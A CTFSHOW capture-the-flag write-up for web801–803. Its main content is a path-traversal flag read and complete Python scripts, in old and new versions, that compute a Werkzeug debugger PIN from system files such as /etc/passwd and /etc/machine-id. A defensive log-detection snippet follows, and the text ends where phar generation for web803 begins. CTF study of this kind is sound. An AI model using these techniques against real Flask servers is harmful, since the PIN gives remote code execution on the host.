CTFSHOW Common Techniques (801



2024-07-12 05:22 | Source: collected from the web | Views: 265

CTFSHOW Common Techniques

The group owner already explained everything clearly in the video; the notes below are brief and are meant only as a supplementary collection of payloads.


web801

Unintended solution: read the flag directly with /file?filename=/flag

Intended solution: compute the Werkzeug debugger PIN. The way newer versions compute it has changed somewhat.

probably_public_bits contains four fields: username, modname, getattr(app, '__name__', app.__class__.__name__) and getattr(mod, '__file__', None).

username is the user name on the current host: on Linux read /etc/passwd, on Windows look at the C:/Users directory. modname is 'flask.app'. getattr(app, '__name__', app.__class__.__name__) is 'Flask'. getattr(mod, '__file__', None) is the absolute path of the app module inside the flask package.

private_bits contains two fields: str(uuid.getnode()) and get_machine_id().

str(uuid.getnode()) is the MAC address of the network interface as a decimal integer. On Linux it is stored in /sys/class/net/<interface>/address (the interface is usually eth0); on Windows run ipconfig /all in cmd.

get_machine_id() is the unique machine id of the current host. On a non-Docker machine each machine has its own unique id; on Linux it usually lives in /etc/machine-id or /proc/sys/kernel/random/boot_id, while inside a Docker container the value is read from /proc/self/cgroup. On Windows the id is in the registry (HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Cryptography).

The code changed a little in newer versions; the old version is the following:

import hashlib
import getpass
from flask import Flask
from itertools import chain
import sys
import uuid

username = getpass.getuser()
app = Flask(__name__)
modname = getattr(app, "__module__", app.__class__.__module__)
mod = sys.modules.get(modname)
probably_public_bits = [
    username,  # user name, usually root; otherwise read /etc/passwd
    modname,  # usually fixed: flask.app
    getattr(app, "__name__", app.__class__.__name__),  # fixed, usually Flask
    getattr(mod, "__file__", None),  # absolute path of app.py in the flask package, obtainable from the error page
]
mac = '02:42:ac:0c:ac:28'.replace(':', '')
mac = str(int(mac, base=16))
private_bits = [
    mac,
    "机器码"  # placeholder: fill in the machine id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")
cookie_name = "__wzd" + h.hexdigest()[:20]
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = ("%09d" % int(h.hexdigest(), 16))[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num
print(rv)

The new version is as follows:

import hashlib
import getpass
from flask import Flask
from itertools import chain
import sys
import uuid
import typing as t

username = 'root'
app = Flask(__name__)
modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)
mod = sys.modules.get(modname)
mod = getattr(mod, "__file__", None)
probably_public_bits = [
    username,  # user name
    modname,  # usually fixed: flask.app
    getattr(app, "__name__", app.__class__.__name__),  # fixed, usually Flask
    '/usr/local/lib/python3.8/site-packages/flask/app.py',  # absolute path of app.py (from the error page)
]
print(probably_public_bits)
mac = '02:42:ac:0c:ac:28'.replace(':', '')
mac = str(int(mac, base=16))
private_bits = [
    mac,  # MAC address as a decimal integer
    "机器码"  # placeholder: fill in the machine id
]
print(private_bits)
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num
print(rv)

Only one of the values to fill in has changed: the machine id. The old version only reads /proc/self/cgroup, but the new version additionally prepends the value of /etc/machine-id or /proc/sys/kernel/random/boot_id to it.
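As an added defender-side example (not part of the original writeup), the following Python parses constructed access-log lines and flags clients that repeatedly submit PINs to the Werkzeug debug console (/console?__debugger__=yes&cmd=pinauth) or run commands through it; the log lines, addresses and the attempt threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post): one client
# visits the debug console, submits several PINs, then runs a command.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2024:05:22:01 +0000] "GET /file?filename=report.txt HTTP/1.1" 200 1431
10.0.0.5 - - [12/Jul/2024:05:22:03 +0000] "GET /console HTTP/1.1" 200 5217
10.0.0.5 - - [12/Jul/2024:05:22:04 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=123-456-789&s=abc HTTP/1.1" 200 27
10.0.0.5 - - [12/Jul/2024:05:22:05 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=111-222-333&s=abc HTTP/1.1" 200 27
10.0.0.5 - - [12/Jul/2024:05:22:06 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=444-555-666&s=abc HTTP/1.1" 200 26
10.0.0.5 - - [12/Jul/2024:05:22:07 +0000] "GET /console?__debugger__=yes&cmd=print(1)&frm=0&s=abc HTTP/1.1" 200 19
192.168.1.9 - - [12/Jul/2024:05:23:00 +0000] "GET /index.html HTTP/1.1" 200 612
"""

# Common log format: client address, then the request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(path):
    """Return 'pinauth', 'exec', 'console' or None for one request path."""
    parts = urlsplit(path)
    if parts.path != "/console":
        return None
    q = parse_qs(parts.query)
    if q.get("__debugger__") != ["yes"]:
        return "console"           # the console page itself
    cmd = q.get("cmd", [""])[0]
    if cmd == "pinauth":
        return "pinauth"           # a PIN submission
    if cmd in ("resource", ""):
        return "console"           # static resources of the debugger UI
    return "exec"                  # any other cmd is code sent to the console

def report(log_text):
    """Per-client counts of console visits, PIN attempts and executed commands."""
    stats = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m.group(2))
        if kind:
            stats.setdefault(m.group(1), Counter())[kind] += 1
    return stats

def alerts(stats, max_pin_attempts=2):
    """Clients that guessed PINs more than max_pin_attempts times or ran code."""
    return sorted(ip for ip, c in stats.items()
                  if c["pinauth"] > max_pin_attempts or c["exec"] > 0)
```

Any hit from alerts() on a production host means the Werkzeug debugger is reachable, which is the condition to fix; the PIN is only a last line of defence.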

web802

I wrote a separate article on this type of challenge earlier.

web803

The challenge's web directory is not writable, so the file has to be written somewhere else, for example under /tmp. First generate the phar file


